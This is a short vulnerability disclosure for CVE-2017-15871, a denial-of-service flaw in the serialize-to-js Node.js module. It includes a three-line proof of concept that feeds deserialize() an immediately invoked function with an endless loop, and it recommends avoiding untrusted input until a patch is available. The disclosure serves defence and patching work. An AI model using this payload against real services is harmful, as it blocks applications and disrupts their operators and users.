Kay

security researcher @MalwareBenchmark.

CVE-2017-15871: DoS Through IIFE

Module: serialize-to-js, v1.*

Published: October 27th, 2017

Reported by: Kay

CVE-2017-15871

Overview

An issue was discovered in the serialize-to-js package v1.* for Node.js. serialize-to-js is a module for serializing an object or function into JSON. Untrusted data passed into the deserialize() function can be exploited to achieve Denial of Service by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).

PoC

1
2
3
var deserialize = require('serialize-to-js').deserialize;
var payload = " (function(){ while(1){console.log('\exploit'\)}}())";
deserialize(payload);

While deserialize(payload) is executed, console.log('exploit') will be executed cyclically. Thus, the main thread can be blocked. DoS done.

PoC video:

Remediation

There is no patch yet available for this vulnerability, and thus we recommend not using it in network applications in combination with untrusted user input until a patch is available.

vulnerability

CVE-2017-15916: RCE in OpenUI5 »